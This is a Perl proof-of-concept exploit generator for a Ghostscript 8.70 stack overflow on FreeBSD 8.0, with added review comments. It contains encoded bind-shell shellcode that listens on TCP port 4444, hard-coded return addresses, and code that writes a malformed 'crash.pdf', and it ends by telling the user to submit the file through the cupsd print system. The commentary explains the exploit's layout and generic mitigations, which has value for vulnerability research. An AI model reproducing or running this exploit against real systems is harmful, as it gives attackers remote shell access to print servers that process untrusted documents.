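##########################################################################
# Check Point Software Technologies - Vulnerability Discovery Team (VDT) #
# Rodrigo Rubira Branco -                                                #
#                                                                        #
# GhostScript Stack Overflow                                             #
#                                                                        #
##########################################################################

# Proof-of-concept file generator: builds one malformed document in memory
# and writes it to ./crash.pdf. The script does no network I/O itself.
# Per its own banner text the target is Ghostscript 8.70 on FreeBSD 8.0.
#
# NOTE(review): the page names no advisory or CVE identifier and no fixed
# version; confirm both against the vendor advisory before using this
# listing for triage or for a regression test.

use strict;
use warnings;

# bsd/x86/shell_bind_tcp - 214 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# AppendExit=false, PrependSetresuid=false,
# PrependSetuid=false, LPORT=4444, RHOST=,
# PrependSetreuid=false
#
# Analyst note: per the generator header above, the observable result of a
# successful run is a TCP listener on port 4444 owned by the process that
# parsed the file. The bytes are reproduced unchanged from the original.
my $buf =
"\x54\x5a\xda\xd1\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x43" .
"\x43\x43\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58" .
"\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42" .
"\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" .
"\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x50\x31\x49\x50" .
"\x46\x30\x45\x38\x4b\x4f\x44\x42\x42\x31\x51\x4c\x4d\x59" .
"\x4b\x57\x50\x50\x43\x5a\x45\x51\x42\x4a\x44\x42\x42\x4a" .
"\x44\x50\x4e\x50\x45\x31\x48\x4d\x4b\x30\x51\x47\x46\x30" .
"\x46\x30\x43\x5a\x45\x38\x51\x48\x48\x4d\x4b\x30\x4d\x59" .
"\x51\x57\x4a\x4c\x48\x30\x43\x5a\x48\x4d\x4d\x50\x4e\x50" .
"\x45\x4e\x48\x4d\x4d\x50\x50\x50\x50\x50\x43\x5a\x51\x4a" .
"\x50\x58\x48\x4d\x4d\x50\x4b\x4f\x50\x4f\x4a\x44\x43\x49" .
"\x4b\x46\x46\x30\x42\x48\x46\x4f\x46\x4f\x44\x33\x42\x48" .
"\x43\x58\x46\x4f\x43\x52\x45\x39\x42\x4e\x4b\x39\x4b\x53" .
"\x46\x30\x46\x34\x50\x53\x50\x50\x48\x30\x47\x4b\x48\x4d" .
"\x4d\x50\x41\x41";

# Layout of the generated file, in order:
#   - the literal "e!PS" (so, despite the .pdf name, the data does not begin
#     with a PDF header),
#   - 500 bytes of "A" filler and a run of marker digits/letters,
#   - two hard-coded little-endian 32-bit values in the 0xbfbfxxxx range, the
#     first labelled "Shellcode Addr" by the author,
#   - a repeated two-byte pattern, "C" padding sized so that padding plus
#     payload is 1200 bytes, the payload itself, and 100 trailing "Z" bytes.
# Because the addresses are fixed constants, the file depends on the target
# process having the same memory layout as the author's test system; address
# randomisation and a non-executable stack are the generic mitigations for
# this pattern, alongside running a fixed Ghostscript build.
my $pkt = "e!PS".
"A" x 500 .
"00001111222233334444555556666777788889999aaa".
"\x40\xd9\xbf\xbf". #Shellcode Addr
"bccccddd".
"\xef\xbe\xbf\xbf".
"ffff".
"\xff\xbf" x 100 .
"C" x (1200 - length($buf)) .
$buf .
"Z" x 100;

print STDERR "Check Point Vulnerability Discovery Team (VDT)\n";
print STDERR "GhostScript 8.70 exploit for FreeBSD 8.0!\n";
print STDERR "Rodrigo Rubira Branco (BSDaemon)\n";

print STDERR "\nCreating evil pdf ...";

# Three-argument open on a lexical handle with the :raw layer: the data is
# binary, and the original two-argument bareword open ignored every failure
# and reported success even when nothing had been written.
open(my $out, '>:raw', 'crash.pdf')
    or die "\ncannot open crash.pdf for writing: $!\n";
print {$out} $pkt
    or die "\ncannot write crash.pdf: $!\n";
close($out)
    or die "\ncannot close crash.pdf: $!\n";

print STDERR " d0ne!\n";

# The author's delivery path is the print system: Ghostscript is commonly run
# by print filters on documents submitted by other users, so the parser sees
# untrusted input with the filter's privileges.
print "Now print it via cupsd!\n";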